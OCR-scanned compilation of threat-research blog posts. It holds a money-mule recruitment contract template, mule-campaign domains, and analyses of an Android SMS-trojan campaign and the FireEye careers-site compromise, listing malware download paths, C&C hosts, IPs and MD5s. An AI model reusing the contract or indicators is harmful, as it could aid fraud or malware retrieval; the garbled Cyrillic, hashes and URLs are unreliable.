(B) The Agent is a company involved in <business of Agent>. 
(C) FINNS wishes to engage Agent to provide certain outsourced services under the terms 
and conditions of this Representation Agreement (“Agreement”). 


IT IS AGREED AS FOLLOW: 


1, Appointment 
(A) FINNS hereby retains Agent to act as FINNS’s exclusive agent to provide the Services 
(as defined below) for the duration of the Term (as defined below) in the Territory (as 
defined below). 


(B) FINNS shall provide to the Agent all necessary information necessary for the Agent to 
provide the Services. 


2. Services 
The Agent shall: 

(A) represent, advise and counsel FINNS; 

(B) sign documents related to credit card acceptance for and on behalf of FINNS; and 
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(C) perform the FINNS Activities (as defined below in Clause 3(A) hereinafter referred to 
as the “Services”. 


3. Duties of the Agent 
In providing the Services, the Agent shall have the following specific obligations: 


(A) Perform FINNS Activities (being those activities specifically agreed between the 
parties in respect of sales process handling). 


(B) The Agent shall transfer to FINNS’s bank account all funds originating from FINNS 
Activities less the Agency Fee originated from FINNS activities and the 
Disbursements (as defined below) from Agent's bank at the earlier of either EUR 
3000 minus the Agency Fee or every 2 working days, via international bank wire. 
The cost of the international bank wire is deducted from the funds owed to FINNS. 


(C) The Agent shall agrees to provide FINNS with online view-only access to Agent's 
bank account in order for FINNS to audit the cash flow derived from FINNS 


(D) The Agent, shall, on a monthly basis provide a report to FINNS of all FINNS 
ee ing such amounts collected by the Agent on 
FINNS. 


(E) FINNS agrees that certain costs may be incurred by the Agent in the set-up and 
implementation of a business operation in the <country> (the “Territory”). In the 
event the Agent envisages such being incurred, the Agent will provide to FINNS all 
final cost estimates involving 3“ party services. Once agreed upon, FINNS will 
provide Agent with signed approval in a timely manner. FINNS further agrees that all 
approved costs relating to the above, will be either deducted from funds collected by 
the Agent (the “Disbursements”) on FINNS’s behalf or provided in installments by 
FINNS prior to the commencement of the activities under credible and pervasive 
evidence for such need (for instance — 3 party invoices), The ultimate decision to 
choose between the former and the latter belongs to FINNS. 


4. Agency Fee 
(A) As consideration for the Services to be provided by the Agent, the Agent shall receive 
5% (five percent) of the amounts collected and received by the Agent on behalf of 
FINNS originating from the FINNS Activities (the “Agency Fee"). 


(B)The Agency Fee shall be deducted by the Agent from funds to be transferred to 
FINNS in accordance with Clause 3(B) above. 


5. Term 
This Agreement shall commence on the date first written above and shall continue in full 


force and effect for a period of 1 (one) year unless otherwise terminated in accordance with 


6, Termination 


(A) — Without limiting its other rights or remedies, FINNS may terminate this Agreement 
with immediate effect by giving written notice to the Agent if: 

(a) the Agent commits a material or persistent breach of the Agreement and (if 
such a breach is remediable) fails to remedy that breach within 7 days of 
receipt of notice in writing of the breach; 

(b) the Agent commences negotiations with all or any class of its creditors with a 
view to rescheduling any of its debts, or makes a proposal for or enters into 
any compromise or arrangement with its creditors other than (where a 
company) for the sole purpose of a scheme for a solvent amalgamation of the 
Agent with one or more other companies or the solvent reconstruction of the 
Agent; 

(c) @ petition is filed, a notice is given, a resolution is passed, or an order is made, 
for or in connection with the winding up of the Agent (being a company) 
other than for the sole purpose of a scheme for a solvent amalgamation of the 
Agent with one or more other companies or the solvent reconstruction of the 
Agent, 

(¢) an application is made to court, or an order is made, for the appointment of an 
administrator or if a notice of intention to appoint an administrator is given or 
if an administrator is appointed over the Agent (being a company); or 

(e) the Agent suspends or threatens to suspend, or ceases or threatens to cease to 
carry on, all or a substantial part of its business. 


(B) Without limiting its other rights or remedies, FINNS may terminate the Agreement by 
giving the Agent | (one) months’ written notice. 


7. Consequences of Termination 


(a) the Agent shall immediately deliver to FINNS all monies then owing to 
FINNS less any applicable Agency Fee and Disbursements; 

(>) the accrued rights, remedies, obligations and liabilities of the parties as at 
termination shall not be affected, including the right to claim damages in 
respect of any breach of this Agreement which existed at or before the date of 

(c) Clauses which expressly or by implication have effect after termination shall 
continue in full force and effect. 


8, Indemnity 


(A) — The Agent shall keep FINNS indemnified in full against all costs, expenses, damages 
and losses (whether direct or indirect), including any interest, fines, legal and other 
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(B) 


(cy 


professional fees and expenses awarded against or incurred or paid by FINNS as a 
result of or in connection with any claim made against FINNS by a third party arising 
out of, or in connection with, the supply of the Services, to the extent that such claim 
arises out of the breach, negligent performance or failure or delay in performance of 
the Agreement by the Agent, its employees, agents or subcontractors. 


FINNS shall keep the Agent indemnified in full against all costs, expenses, damages 
and losses (whether direct or indirect), including any interest, fines, legal and other 
professional fees and expenses awarded against or incurred or paid by Agent as a 
result of or in connection with any claim or chargeback made against Agent by a third 
party arising out of, or in connection with the sales, activities and actions of FINNS, 
its employces, agents or subcontractors. 


This Clause 8 shall survive termination of this Agreement. 


9. Bank, Transaction Fees and Tax Liability 


All current or future bank fees, including, but not limited to, credit card processing, ACH 
transactions and bank administration and all current or future tax liability, including, but not 
limited to, local, EU or international tax, relating directly to the business activity conducted 
on behalf of FINNS, will be the responsibility of FINNS. When due, will be deducted and 
paid to the proper authority from funds collected by the Agent on behalf of FINNS. The 
Agent agrees to provide copies of all documentation, invoices and demands for payment to 
FINNS prior to making any payment relating to the above. 


10. General 


(A) Force majeure: Neither party shall be liable to the other as a result of any delay or 


failure to perform its obligations under this Agreement if and to the extent such delay 
or failure is caused by an event or circumstance which is beyond the reasonable 
control of that party which by its nature could not have been foreseen by such a party 
or if it could have been foreseen was unavoidable. If such event or circumstances 
prevent the Agent from providing any of the Services for more than 4 weeks, FINNS 
shall have the right, without limiting its other rights or remedies, to terminate this 
Agreement with immediate effect by giving written notice to the Agent. 


(B) Assignment and subcontracting: FINNS acknowledges that the Agent may engage 


other licensed or individual persons to fulfill certain terms of this Agreement save that 
such persons shall have no rights under this Agreement. 


(C) Waiver and cumulative remedies 


(a) A waiver of any right under this Agreement is only effective if it is in writing 
and shall not be deemed to be a waiver of any subsequent breach or default, No 
failure or delay by a party in exercising any right or remedy under this 
Agreement or by law shall constitute a waiver of that or any other nght or 
remedy, nor preclude or restrict its further exercise. No single or partial 
exercise of such right or remedy shall preclude or restrict the further exercise of 
that or any other right or remedy. 


(b) Unless specifically provided otherwise, rights arising under the Contract are 
cumulative and do not exclude rights provided by law. 


(D) Severance: 


(a) Ifa court or any other competent authority finds that any provision (or part of 
any provision) of this Agreement is invalid, illegal or unenforceable, that 
provision or part-provision shall, to the extent required, be deemed deleted, 
and the validity and enforceability of the other provisions of this Agreement 
shall not be affected. 

(b) If any invalid, unenforceable or illegal provision of this Agreement would be 
valid, enforceable and legal if some part of it were deleted, the provision shall 
apply with the minimum modification necessary to make it legal, valid and 
enforceable. 


(E) Third parties: A person who is not a party to this Agreement shall not have any rights 


under or in connection with it. 


(F) Variation: Any variation, including any additional terms and conditions, to this 


Agreement shall only be binding when agreed in writing and signed by FINNS. 


(G) Governing law and jurisdiction: Any dispute or claim arising out of, or in connection 


with this Agreement or its subject matter or formation (including non-contractual 
disputes or claims), shall be governed by, and construed in, accordance with, English 
law. 


(H) Disputes: In the event of a dispute arising out of or in connection with this Agreement, 


() 


the parties shall try to resolve the issue amicably within 15 day of a party notifying the 
other party of the grounds of the dispute. In the event that the parties are still unable 
to resolve the dispute, the parties agree that the dispute shall be finally resolved by 
arbitration under the ICC Rules (the ICC Rules then in force shall be deemed to be 
incorporated into this Agreement) in the LCIA. There shall be a single arbitrator 
appointed by the Chairperson of LCIA and the seat of arbitration shall be London. 
The arbitration shall be conducted in English. The parties agree that the arbitrator's 
decision shall be final and binding on the parties and the losing party shall bear the 
cost of the arbitration proceedings. 


Validity: This Agreement shall be executed in the quantity of 2 original copies signed 
by FINNS’s and the Agent's representatives and then retained in the quantity of | 
original copy by FINNS and | original copy by the Agent, each copy of the 
Agreement signed shall serve as an original. 
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This Agreement has been entered into on the date stated at the beginning of it. 


<Full Name>, on behalf of <COMPANY NAME> 


Sample domains from the mule recruitment campaigns spamvertised over email: 


googleapp-consult.com 
googleapps-euro.com 
worlds-trade.com 
trades-consult.com 
worlds-diploms.com 


Sample name servers involved in the campaign: 


NS1.ELCACAREO.NET - 184.82.62.16; 136.0.16.169; 184.82.204.70 - Email: shanghaiher- 
ald32@yahoo.com 


NS2,.ELCACAREO.NET - 6.87.78.121 


The same email (shanghaiherald32@yahoo.com) is also known to have also been used 
to register the following fraudulent/malicious domains: 


badstylecorps.com 


tvblips.net 
viperlair.net 
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[26]"The only green is money". 


This post has been reproduced from [27]Dancho Danchev’s blog. Follow him 
[28]Jon Twitter. 


1. http: //ddanchev. blogspot . com/2010/04/dns-infrastructure-of-money-mule . html 

2. http: //ddanchev. blogspot. com/2009/10/standardizing-money-mule-recruitment .htm1 

ttp://blog.webroot . com/2013/03/22/spotted-cybercriminals-working- on-new-western-union-based-money-mule- 
. http: //ddanchev. blogspot . com/2011/08/keeping-money-mule-recruiters-on-short html 

. http: //ddanchev. blogspot. com/2011/07/keeping-money-mule-recruiters-on-short .html 


ttp://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_30.htm 


na 


ttp://ddanchev. blogspot .com/2011/05/keeping-money-mule-recruiters-on-short_25.htm 


. http: //ddanchev.. blogspot . com/2011/05/keeping-money-mule-recruiters-on-short -htm] 
http: //ddanchev. blogspot . com/2011/03/keeping-money-mule-recruiters-on-short .html 
10. http: //ddanchev. blogspot . com/2011/01/keeping-money-mule-recruiters-on-short . html 
11. http: //ddanchev. blogspot . com/2010/04/dns-infrastructure-of-money-mule .html 


12. http://ddanchev. blogspot .com/2010/04/keeping-money-mule-recruiters-on-short.htm 


onaNausD 


13. http://ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving.htm 


14. 
15. 
16. 

17. 
18. http://ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 
19. 
20. 


21. http://ddanchev. blogspot .com/2009/05/inside-money-laundering-groups-spamming. htm 


22. http://ddanchev. blogspot . com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 


23. http://ddanchev. blogspot .com/2008/10/money-mules-syndicate-actively.htm 


24. http://ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment. htm 


25. http://ddanchev. blogspot .com/2009/10/standardizing-money-mule-recruitment.htm 
26. http://www.imdb.com/title/tt1027718 


27. http://ddanchev.blogspot.com/ 
28. http://twitter.com/danchodanche 


4771 


9.8.13 Summarizing Webroot’s Threat Blog Posts for August (2013-08-30 14:11) 


threat blog 


Products  Suppon Communty& Resources Partners About Webroot About the Bloggers 


Cybercrime-friendly underground traffic vai search 
exchanges help facilitate fraudulent and Save. 
malicious activity — part two 20” 

vorwarere ° 5 Votes ms » Small Business Security 
By Dancho Danchev 


The kst of monetiz 
traffic, ts virtually tret 


they manage to hyack a huge porton of Web 
stem 


cybercnme 


and is based on his experience within ti 


Through the utkzaton of blackhat SEO (search engine optimization), RFI (Remote File inclusion), ONS cache 
poisoning, of direct menpersonation of popufar brands mn spamyphsting campaigns tac 1a Gaily bases, Walfic is sold and 
resold for achieving a customer's or a seller's fraudulentimalcious obsectves., and is then most commonly converted to 


WEB THREAT REPORT: 


mahware-infected hosts 


cybercrime-friendly iFrame traffic exchanges, with the 


as well as semces violating YouTube's Ti 


ToS (Terms of Se 
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The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for August, 
2013. You can subscribe to [2]Webroot’s Threat Blog RSS Feed, or follow me on Twitter: 


x 


01. [3]‘Malware-infected hosts as stepping stones’ service offers access to hundreds of 
compromised U.S based hosts 

02. [4]New ‘Hacked shells as a service’ empowers cybercriminals with access to high page 
rank-ed Web sites 

03. [5]Fake ‘iPhone Picture Snapshot Message’ themed emails lead to malware 

04. [6]Malicious Bank of America (BofA) ‘Statement of Expenses’ themed emails lead to 
client-side exploits and malware 

05. [7]Cybercriminals spamvertise fake ‘O2 U.K MMS’ themed emails, serve malware 

06. [8]One-stop-shop for spammers offers DKIM-verified SMTP servers, harvested email 
databases and training to potential customers 

07. [9]Fake ‘Apple Store Gift Card’ themed emails serve client-side exploits and malware 

08. [10]Newly launched managed ‘malware dropping’ service spotted in the wild 

09. [11]Cybercrime-friendly underground traffic exchange helps facilitate fraudulent and 
malicious activity 

10. [12]From Vietnam with tens of millions of harvested emails, soam-ready SMTP servers and 
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DIY spamming tools 

11. [13]DIY Craigslist email collecting tools empower spammers with access to fresh/valid 
email addresses 

12. [14]Bulletproof TDS/Doorways/Pharma/Spam/Warez hosting service operates in the open 
since 2009 

13. [15]DIY automatic cybercrime-friendly ‘redirectors generating’ service spotted in the wild 
14, [16]Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase 

15. [17]Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and 
malicious activity - part two 


This post has been reproduced from [18]Dancho Danchev’s blog . Follow him 
[19]on Twitter. 
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9.9 September 


9.9.1 Rogue iFrame Injected Web Sites Lead to the AndroidOS/Fakelnst/Trojan- 
SMS.J2ME.JiFake Mobile Malware (2013-09-16 14:29) 


A currently ongoing malicious campaign relying on injected iFrames at legitimate Web 
sites, successfully [1]segments mobile traffic, and exposes mobile users to fraudulent legiti- 
mately looking variants of the AndroidOS/Fakelnst/Trojan-SMS.J2ME.JiFake mobile malware. 


Let’s dissect the campaign, expose the domains portfolio currently/historically known to 
have been involved in this campaign, as well as list all the malicious MD5s known to have 
been pushed by it. 


iFrame injected domains containing the mobile traffic segmentation script parked on 
the same IP: 


asphalt7-android.org - 93.170.109.193 
fifal2-android.org 


gta3-android.org 
fruit-ninja-android.org 
wildblood-android.org 
osmos-android.org 
moderncombat-android.org 
minecraft-android.org 
googlanalytics.ws 
getinternet.ws 
ddlloads.com 
googlecount.ws 
opera-com.com 
opgrade.ws 
statuses.ws 
ya-googl.ws 
yadirect.ws 
yandex-google.ws 
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Neardopea: Ancrod 


Soke: Rance’ oT ycvpodcraa, No yHOmMNO - Jr 


AsphaR 7 mamma ¢ Coremor Yeepeerocte KaDEITE 
COMM ODM AM, SIRT RB ROEM # CuCT De 

ast OOMRET ODOM ane Androd, notoery wto Baw 
TORACTOMT CENT HTS BCE DHCEH H FROSOTECTENE OT 
CEODOCTHOR exe Ha aETOMOtUne # OAMMOrO DEE 
baeravera, PapaSotunat toeatamre (0 tmos 
aeromobured, Dean watooME - Seopaon, MamSoogmnes, 
Acton Magtem # DeLorean, Kctat, >To veeeemo Tor 
PATEMZaOMEH BETO, KOTODED Petar 6 Guree «Hanan 6 
Cyayete>, Ha 2TH WERECHeK H CODER ERONEE MamvOCER Be 
TOOMECETERDD MO VARIAN EDYTNOR ERE MEDOmEK 
meranorecos ~ Mocepy, Touro, Momacna, Napeaca # 
Memon Eon, ParpaSotana mosam wacte «Acdatere, 
eoTOpaE MpeAnORaraeT 6 Demvenns raw u bonee Cote 
seennos. Ban Gyaet xazatece, nax Gewerae Ceopocte 
POET REDET B9C £ B2EE KOMTROTEDMDE KDECTO. 
Nowepere, CADDO WeECTe CRIME CHAIN OMOryT uIDITE 
te Sau Loy mA, B Ogrom mEIme TOMANOFITIETCR CoaTY 
BO 5 UIDOKOE, BOT Ge H DOEHTE, ETO HD EX CeameTCE 
Pyemrt 2 ITOT Das, Ceauate Asphalt 7romet camgee, 
POITOMY QUEM CKODO C MONOD OCT OM MOwCK ¥ BIC 
Gyayt mOewe COMEDHIROH CO BOER yrOMKOE denM, C 
KOTODERE! Be BHECTE CHOMKETE NDOBECTH HmOrO WRCOE 
TEREST eSROWETO TeFmITER C COBDENERMOM TDaguEnd Ht 
Cmymersrent na Cee Coteawn ECTMECKOS ALDEMAt~ND, 
Meorne PRO Onoren OutreTe ND BOCTOMmCTEyY 
TOCAMRY URE BEDCHE TOR Fre. HM momHD OTMETHTE, “TO 
<SRGI MORIA BEDOIR CTaHOENTCR C Kaa DaON BOE 
Coree pearnctuwod, padena Copepmencteverce, ax 
sce seyeoewe 2OOexTw. B wTore Asphat 7 Androd, 
CORRMAR BEDI DTOR UIDE, CTANa Camoh KDaCHEOR, 
TEBITeERO~EA. Ona, HECOMmENmO, ORRET CURHERD 
mokutensea: Tonos, Cheuratend Ge >TOR uIDw 
paspafotumc "peaccTamite boremoe Korwwecteo 
CRODOCTIME TREE. OF MDOMAME BEDCHE C preter 
PORTER HEPLETO HE OCTAMOCe, 2 BIN TORMETCR 
TOOKSTUT ECE NO VRUAM FORECTHOD INE FODQROS PDD, 
Cmyeans CeGm waCTomapen CTpuTDeAKCeDOM, EOTODE! 
VHRORETCH © FODORCKDO KBOCE MDONECTIKD ¢ BETEDECO 
CDW THLE OT NOIRE HF POC UNA ermK BOT OS. B Toe 
rpe TOGACTaEFEre Ka BwOOD CDazy TDH DemDENa — 
CwctDam romaa, KapeeDrwe wv EOtneeT man urate 
Cex OyRET MOMUT HE YERETENMEN B KADREDHOD TOME 


3 roman, 3 BCerO HK 8 MIDE 35. KeratH, CommaTetH 
TOMHRLH DEWEMUE HE UDOEMETE NORM LYUY DERI 
TOMOK, MOITOMY HTDOKOE CUOLLROT TOMER UMNe 

CTAMEAD TIME FONE Ha 2 KDYTA, IDEARA, CODEEMOEIHHE HD 
ufesmreee us orate Nekacetams nae mn tre 


Sample mobile malware MD5s pushed by the campaign: 
[2]MD5: e77f3bffel8fb9f5alble5e6a0b8aafvs 


[3] 


MD5: 5fb4ccObO0d8dfe8011c44f97c6dd0aa2[4] 
[5] 


MD5: 9348b5a13278cc101lae95cb2a88fe403[6] 


[7]MD5: f4966c315dafa7e39ad78e31e599e8d0 
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[8]MD5: 6f839dd29d2c7807043d06ba19e9c916 
[9]MD5: 8cfebfa7175e6e9al0e2a9ade4d87405 


[10]MD5: 4e5af55dd6a310bced83eb08c9a635b3 


Phone back location: /hxxp://depositmobi.com/getTask.php/task=updateOpening &s= - 
93.170.107.130 


Parked on the same IP (93.170.107.130) are also the following domains participating in 
the campaign’s infrastructure: 


123diskapp.com 
1lgameminecraft.ru 
2010mobile.ru 

absex.ru 

ammla.info 
and4mobiles.ru 
android-apk-file.ru 
android-games-skachat.ru.com 
android-key.ru 
android-market-apk.ru 
android-market-cools.ru 
android-vk.com 
android7s.ru 
androidcool.tk 
androiderus.com 
androidnns.ru 
androidone.net 
androidperfomance.com 
androids-market.ru 
androidupos.ru 
24-android.ru 
online-android.ru 
moiandroid.ru 
ktozdesj.ru 
super-androids.ru 


The following malicious mobile malware MD5s are known to have phoned back to the 
same IP in the past: 


[11]MD5: 572b07bd031649d4a82bb392156b25c6 


[12]MD5: 9685ff439e610fa8f874bf216fa47eee 
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[13]MD5: 6d9dd3c9671d3d88f16071f1483faal2 
[14]MD5: 276b677b3242cb0f767bfba0009bcf3e7 


[15]MD5: aefdbdee7f873441b9d53500elaf34fa 


What’s also worth emphasizing on is that we’ve also got a decent number of malicious 
Windows samples known to have phoned back to the same IP in the past, presumably in an 
attempt by fellow cybercriminals to monetize the traffic through an affiliate program. 
MD5: bac8f2c5d0583ee8477d79dc52414bf5 

MD5: alae35eadf7599d2f661a9ca7f0f2150 

MD5: 419fdb78356eaf61f9445cf828b3e5cf 

MD5: abce96eaa7c345c2c3a89a8307524001 

MD5: 93d11dc11cccc5ac5ald57edce73ea07 

MD5: 53bbad9018cd53d16fb1a21bd4738619 

MD5: 15f3eca26f6c8d12969ffb1dbeead236 

MD5: 72c6c14f9bab8ff95dbaf491f2a2aff6 

MD5: a282b40d654fee59a586b89alal2cac2 

MD5: e0798c635d263f15ab54a839bf6bac7f 

MD5: 7b61d8820cc012deac282fc72471310bd 

MD5: 21fdbb9e9e13297ae12768764e169fb4 

MD5: 47fa4a3a7d94dad9faclcbdc07862496 

MD5: 5e€9321027c73175cf6ff862019c90af7 

MD5: cfbaccc61dc51b805673000d09e99024 

MD5: 8bc4dd1laff76fd4d2513af4538626033 

MD5: f6a622f76b18d3fa431a34eb33be4619 

MD5: c068d11293fc14bebdf3b3827e0006ac 


MD5: d68338a37f62e26e701dfe45a2f9cbf2 
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MD5: e1¢9562b6666d9915c7748c25376416f 
MD5: 1dccd14b23698ecc7c5a4b9099954ae4 


MD5: 47601e9f8b624464b63d499af60f6c18 


Actual download location of a sample mobile malware sample: 


hxxp://mediaworks3.com/getfile.php?dtype=dle &u=getfl &d=FLVPLayer - 78.140.131.124 


Osmos gna android 


Bepcua urpbl: 3 


Nnatdopma: Android 


@aiin: 3aBucuT OT ycTpoiictea, no 
yMonuaHnw - jar 


CkauaTb 


Texct 1000 - 2000 cumBonos. 


© 2013 Bce npaBa SauMueHbl. 


The following mobile malware serving domains are also known to have responded to 
the same IP (78.140.131.124) in the past: 


4apkser.ru 
absex.ru 
agw-railway.com 
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androedis.ru 
android-apk-file.ru 
android-update.name 
android6s.ru 
android7s.ru 
androidappfile.name 
androidaps.ru 
androidbizarre.com 
androidilve.ru 
androidovnioads.com 
androidupss.ru 
apk-load.ru 
apkzona.ru 
bali-special.ru 
com-opera.com 
dml-site.ru 
download-opera.com 


As well as the following malicious MD5s: 
[16]MD5: 8cfebfa7175e6e9al0e2a9ade4d87405 


[17]MD5: 4e5af55dd6a310bced83eb08c9a635b3 


Thanks to the commercial availability of [18]DIY iFrame injecting platforms, the cur- 
rent [19]commoditization of hacked/compromised accounts across multiple verticals, the 
[20 ]efficiency-oriented mass SQL injection campaigns, as well as the existence of beneath 
the radar [21]malvertising campaigns, cybercriminals are perfectly positioned to continue 
monetizing mobile traffic for fraudulent/malicious purposes. 


Updates will be posted as soon as new developments take place. 
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21. http: //ddanchev. blogspot .com/2009/09/ukrainian-fan-club-features.htm 


9.9.2 Dissecting FireEye’s Career Web Site Compromise (2013-09-18 19:41) 


Remember when back in 2010, | established a direct connection between several [1]mass 
Wordpress blogs compromise campaigns, with the campaign behind the [2]compromised 
Web site of the U.S. Treasury, prompting the cybercriminal(s) behind it to [3]redirect all the 
campaign traffic to my Blogger profile? 


It appears that the cybercriminal/gang of cybercriminals behind these mass Web site 
compromise campaigns is/are not just [4]still in business, but also - Long Tail of the malicious 
Web - [5]managed to infect FireEye’ (external network) Careers Web Site. 
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Let’s dissect the campaign, expose the malicious domains portfolio behind it, provide 
MD5s for a sample exploit, the dropped malware, and connect it to related malicious cam- 
paigns, all of which continue to share the same malicious infrastructure. 


Sample redirection chain: 

hxxp://vjs.zencdn.net/c/video.js -> hxxp://cdn.adsbarscipt.com/links/jiump/ (198.7.59.235; 
63.247.93.69; 69.39.238.28; 74.81.94.44) (IE) -> hxxp://cdn.adsbarscipt.com/links/flash/?- 
updnew (CHROME) -> hxxp://209.239.127.185/591918d6c2e8ce3f53ed8b93fb0735cd/face- 
book.php 


Detection rate for a sample malicious script found on the client-side exploits serving 
site: 

[6]MD5: 809f70b26e3a50fb9146ddfa8cf500be - detected by 1 out of 49 antivirus scanners as 
Trojan.Script.Heuristic-js.iacgm 


Sample detection rate for the served client-side exploit: 
[7]MD5: 71c92ebc2a889d3541ff6f20b4740868 - detected by 4 out of 49 antivirus scanners 
as HEUR:Exploit.Java.CVE-2012-1723.gen; HEUR _JAVA.EXEC 


Detection rate for a sample dropped malware: 
[8]MD5: 4bfb3379a2814f5eb67345d43bce3091 - detected by 15 out of 49 antivirus scanners 
as Trojan-PSW.Win32.Fareit.acqv; PWS:Win32/Fareit.gen!C 


The following malicious MD5s are known to have been downloaded from the same IPs 
(cdn.adsbarscipt.com (198.7.59.235; 63.247.93.69; 69.39.238.28; 74.81.94.44): 

[9]IMD5: 82e1013106736b74255586169a217d66 

[10]MD5: 01771c3500a5b1543f4fb43945337c7d 

[11]MD5: dbf6f5373f56f67e843af30fded5c7f2 


Additionally, the campaign is also known to have’ dropped = [12]MD5: 
01771c3500a5b1543f4fb43945337c7d 


Once executed, the most recently dropped sample (MD5: 4bfb3379a2814f5eb67345d43bce3091) 
phones back to the following C &C servers: 

main-firewalls.com (67.228.177.174; 74.204.171.69; 85.195.104.90) - Email: 
alex1978a@bigmir.net 

simple-cdn-node.com (109.120.143.109) - Email: alex1978a@bigmir.net 

akamai.com/gate.php 


Deja vu! We’ve already seen alex1978a@bigmir.net in [13]Network Solution’s (2010) 
mass Wordpress blogs compromise, a campaign which is also directly connected with [14]the 
compromise of the Web site of the U.S Treasury. 


The sample also attempts to download the following additional malware variants: 
main-firewalls.com/6.exe 

main-firewalls.com/1.exe 

simple-cdn-node.com/1.exe - [15]MD5: 05d003a374a29c9c2bbc250dd5c56d7c 


Responding to 67.228.177.174 are also the following malicious domains: 
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aodairangdong.com 
bolsaminimall.com 
catch-cdn.com 
corp-firewall.com 
himarkrealty.com 
ngnetworld.com 
ritz-entertainment.com 
server.evietmusic.com 
viettv24.com 
vpoptv.com 
plussolarsolutions.com 
artistflower.com 
autoairsystems.com 
eighteas.com 
greenpowersurvey.com 
phattubi.com 
ritz-entertainment.com 
saigoncitymall.com 


The following malicious MD5s are also known to have phoned back to the same IP 
(67.228.177.174) in the past: 

MD5: 05636d38090e5726077cea54d2485806 
MD5: 53b73675flb08cf7ecfc3c80677c8d2e 
MD5: O0f424ff9db97dafaba746f26d6d8d5c0 
MD5: 633d6de861ledc2ecf667f02d0997f10e 
MD5: d13ead2b8a424b5e9c5977f8715514c4 
MD5: bfc9803c94cc8ba76a916f8e915042e4 
MD5: a04d33ced90f72c1a77f312708681c07 
MD5: 7e6e15518cc48639612aa4ff00a2a454 
MD5: 98d78ef8cc5aee193a7b7a3c3bb58c87 
MD5: a030d6e35d736db9dd433a8d2ac8a915 
MD5: 1f7a6ed70be6el3efb45e5ba80eed76e 
MD5: cfc727a0ad51eb1f111305873d2ade04 
MD5: 1b6de030ed3b42e939690630f63d6933 
MD5: fa9e92d42580e1789ed04e551a379e4e 
MD5: 2ed9d63e4d557667bad7806872cf4412 
MD5: befl6d25b2cada2a388ea06c204b44f3 
MD5: 77a93ba48d6532e069745bca117d26ed 
MD5: 7c7e4cef8a7181f7982a841f7f752368 
MD5: 57b5e6f38998e32fa93856970cc66c5e 
MD5: 5d388b1f2bf2dc9493f5c4cfb9d53ca0 
MD5: ec24a959e39c5d2eb7dc769f4b098efb 
MD5: 6357085196499ef5301548ff17b62619 
MD5: 3173d4be34f489a4630f2439f9653c2c 
MD5: 3bd239ee46ab8ba02f57ed1762bd3ae6 
MD5: dce3e33eb294f0a7688be5beab6b7e9d4 
MD5: 1led678e9d29c25043fdd1b4c44f5b2ea 
MD5: eccce6f5f509f4ef986d426445a98f0d 
MD5: 74e1e2f2d562ab6883124cfa43300cf2 
MD5: 6922efa2e5aal6b78c982d633cbe44e9 
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Responding to 85.195.104.90 are also the following malicious domains: 
catch-cdn.com 

corp-firewall.com 

kronoemail.com 

main-firewalls.com 

viacominfosys.com 

emaildatastore.com 


The following malicious MD5s are also known to have phoned back to the same IP 
(85.195.104.90) in the past: 

MD5: 88110dbce9591b68b06b859e7965d509 
MD5: 0e055888564fb59cb6d4e35a5c5fb33d 
MD5: e9d8d2842b576fd4f6ef9ddelfea4b9f 
MD5: e750031fc9b9264852133d8f7284ac7a 
MD5: e0da2ca4e9al74cd3c6f8a348e4861ad 
MD5: b23a579d7b8bf5a03c121d2f74234b2d 
MD5: alee5246d984d900f27ce94fbfc37c2b 
MD5: 2118a70a2ccf0a7772725e765ad64e08 
MD5: f26848e64040b4b6614d95bd967045df 
MD5: 9c5997b32bea6945fOcb9ff0c18cf040 
MD5: 353305483087a5316fd75f63d641eclf 
MD5: 34e67771ca411b163866f1le795b2e72e 
MD5: 571e04b5af915979efc5a7f77794facb 
MD5: a21df3ee0c9dd87cf6ca66581aa7eb76 
MD5: e2137edd5f550b1942c16e70095c436b 
MD5: 97437f6d670db2596b6a6b53c887055c 


Such type of factual attribution based on gathered historical OSINT, isn’t surprising, thanks to 
the fact that despite the increasing number of novice cybercriminals joining the ecosystem, the 
"usual suspects" continue operating for the sake of achieving their fraudulent and malicious 
objectives. 


This post has been reproduced from [16]Dancho Danchev’s blog . Follow him 
[17]on Twitter. 


1. http: //ddanchev. blogspot . com/2010/04/dissecting-wordpress-blogs- compromise . html 

2. http: //ddanchev. blogspot .com/2010/05/us-treasury-site-compromise-linked-to.htm 

3. 
4. http://blog.videojs.com/post//unauthorized-modification-of-video-js-cdn-files 

5. http: //waw.fireeye .com/blog/technical/cyber- exploits/2013/09/darkleech-says-hello.html 

6. https: //wuw. virustotal . com/en/file/311c27de84357d9cbe63cbf 798abad294d2daa467d45b7f b4b9bef 4f61340f33/analys 
7. https: //aww. virustotal . com/en/file/a8742556c8270d35d0dc49a29376fb504685d05782cd48f 3764794621747 4b51/analys 
8. https: //www.virustotal . com/en/file/370ect6b98a13b5b37 9 cf 1deedb5926fdb23dd9bac036087cald8al1e2eda8f8/analys 


9. https://www.virustotal .com/en/file/e40a7604c087a7 09ec9b9f8a78564d1542c4d221733eb4ebb512b3d5202a8e1d/analys 
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10. https://www.virustotal.com/en/file/ea3be0fb4367e038c602a3de5811821d2367£3326ab2al 2f 469db4cda06fafa7/ana 
11. bhttps://www.virustotal .com/en/file/59d5d28ac1b169bfc390501£c9d29b551 1dec357345d£5e38c5aa4767 5acd5df /ana 


15. https://www.virustotal .com/en/file/e28f368359094d421 10f bae6bbef 5cca649eac4ba540192827cac7b794bdaab7 /ana 


ysis/ 
16. http: //ddanchev.blogspot.com 
17. http://twitter.com/danchodanche 


9.9.3 Dissecting FireEye’s Career Web Site Compromise (2013-09-18 19:41) 


Remember when back in 2010, | established a direct connection between several [1]mass 
Wordpress blogs compromise campaigns, with the campaign behind the [2]compromised 
Web site of the U.S. Treasury, prompting the cybercriminal(s) behind it to [3]redirect all the 
campaign traffic to my Blogger profile? 


It appears that the cybercriminal/gang of cybercriminals behind these mass Web site 
compromise campaigns is/are not just [4]still in business, but also - Long Tail of the malicious 
Web - [5]managed to infect FireEye’ (external network) Careers Web Site. 


Let’s dissect the campaign, expose the malicious domains portfolio behind it, provide 
MD5s for a sample exploit, the dropped malware, and connect it to related malicious cam- 
paigns, all of which continue to share the same malicious infrastructure. 
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Sample redirection chain: 
